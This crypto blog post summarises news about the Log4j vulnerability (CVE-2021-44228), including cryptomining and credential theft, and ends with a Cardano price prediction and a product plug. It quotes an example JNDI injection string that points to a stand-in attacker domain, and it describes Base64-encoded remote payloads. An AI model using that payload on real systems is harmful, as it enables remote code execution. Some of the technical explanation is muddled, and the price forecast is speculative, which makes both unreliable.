Cryptocurrencies representation

Today, we’ll look at the latest security vulnerability that is sweeping the web, the hacks that it is bringing, and how this is affecting the crypto world. Towards the end, we’ll also dive into some price predictions for Cardano Ada and what that could mean for your investments.

The Log4j Vulnerability

To start off, we’ll talk about the vulnerability that is sweeping the web right now – Log4j. There has actually been 2 waves of Log4j attacks. The first wave of them were brutal, but the next one is going to be even far more brutal. One, because a lot of people think they already patched. Two, because the hackers are getting more and more creative.

Here’s a recent report by WIRED regarding the Log4j vulnerability:

“A week ago, the internet experienced a seismic event. Thanks to a vulnerability in Log4j, a popular open source library, multitudes of servers around the world were suddenly exposed to relatively simple attacks. The first wave of hacking is well underway. But it’s what comes next that should worry you.

So far, the vanguard of Log4j hacking has primarily comprised cryptominers, malware that leeches resources off of an affected system to mine cryptocurrency. (These were extremely popular a few years ago, before everyone realized that the real money’s in ransomware.) Some nation-state spies have dabbled as well, according to recent reports from Microsoft and others. What’s seemingly missing is the extortion, the ransomware, the disruptive attacks that have defined so much of the past two years or so. This won’t be the case for long.”

“It is by far the single biggest, most critical vulnerability ever.” says Amit Yoran, TENABLE.

– What we’ve seen so far…

Taking the above report into account, here’s one example that we found from https://www.tomshardware.com/:

“An Amazon Web Services (AWS) customer had a really bad day when they received an unsolicited $45,000 bill for renting computing power from Amazon’s cloud based servers. Further investigation showed that the customer’s account was hacked, allowing the bad actors to spin up AWS servers around the globe while running a cryptocurrency mining software for privacy-focused coin Monero.”

“On-demand, distributed computing services such as Microsoft’s Azure or Amazon’s Web Services are common, used by organizations and individuals for multiple purposes.”

“The AWS customer finally received a response from the company regarding his exorbitant $45,000 bill; after 27 hours of waiting, they informed him that his case would require a further 24 hours of “monitoring” before it was sent to the billing department for a proper review – which can then take days.”

The funny thing about this is at the end, the hacker only actually gained $800 worth of Monero. Not only was this having a heart attack of $45,000 AWS bill, it utlimately only produced $800 of Monero. These servers aren’t really good at mining anyways because you really need to have the power of a graphics card or other A6 type processing.

Microsoft and the Log4j Exploits

In other news, Microsoft is warning the Log4j exploits extend past crypto mining to outright theft. So, people are actually using the Log4j now to record all the different keystrokes that are coming across the server. Then, they’re now stealing full credentials on some of the most important servers across the world. So people are ultimately using Log4j on Azure to steal credentials and then spin up and steal resources through them.

Microsoft logo
Image by Microsoft

Microsoft has observed activities including installing coin miners, Cobat Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. Additionally, they’re also using this then to spread botnets across the web. This is going to end up causing a lot further problems down the road that we haven’t even detected.

What We’re Dealing With Here…

Moving on, let’s look at what this exploit is and it actually is causing so much noise. According to Check Point, “The vulnerability, designated as CVE-2021-44228 and also referred to as “Log4j”, allows remote attackers to gain control over vulnerable targets. To perform remote code execution, an attacker only needs to send a simple malicious request that contains a formatted string that is then picked up by the log4j library.”

“The vulnerability occurs due to a lack of sanitization in the lookup method used in the log4j library. An attacker can leverage JNDI (Java Naming and Directory Interface) to perform a request to a remote malicious resource as follows: ${jndi:ldap://[attacker_domain]/file}”

“Using different protocols such as ldap, rmi and commands like upper/ lower, an attacker can create multiple attack string combinations. In addition, we observed many obfuscation techniques to avoid detection.”

Breaking down the major attack

Log4j vulnerability
Image by Check Point

From the above example, we can see that the beginning part allows them to then take the part in red. Then, they can string this part together multiple commands by putting them into a Base64 code. This would allow you to basically write an entire computer program, encoded into Base64, and then send it over with the base command to decode the Base64. And then, you can run absolutely anything you want.

And from the above example, you’ll see that they’re downloading a string to then run a set of programs that are installed on some remote server.

So ultimately, the malicious request happens, the server then executes it, it then goes into the ldap, where stays all the usernames and passwords. From there, it then causes to execute a payload, which then pulls down the file from another server and runs it. This would then allow them to do absolutely anything.

So, this is a huge deal and something that we all need to be making sure is getting yourselves patched for, and making sure you’re checking with a security professional if you don’t have any idea about what you’re looking at.

Cardano Ada Price Prediction

Moving towards the end, we’ll finally talk a little bit about Cardano and its price prediction. Obviously, we’ve seen Cardano get beat up pretty bad over the last couple of weeks. However, Cardano Ada has been forming a consolidating pattern, with a triangle that’s near its conclusion, just above a daily demand zone, rising from $1.02 to $1.19. As we can see the consolidating pattern take shape, the chance of Cardano Ada heading lower is low.

Cardano Ada chart

And as this potential rise takes off and it passes the $1.45 mark, we’re seeing Cardano Ada go up to potentially $1.51.

Thank you for sticking with me to the very end. We hope this has been valuable information to your journey with cryptocurrencies. You can keep track of our blog or YouTube channel to stay updated about crypto every day. And as always, make sure to keep your kids protected with CleanRouter and CleanPhone. This lets you have the ultimate parental controls with how your kids use their phone 🙂

If you’d like to learn more the mentioned vulnerability and Cardano price prediction, kindly check out the video below:

Spencer Thomason is the CEO and Co-founder of CleanRouter, as well as many other products.

You must be logged in to post a comment.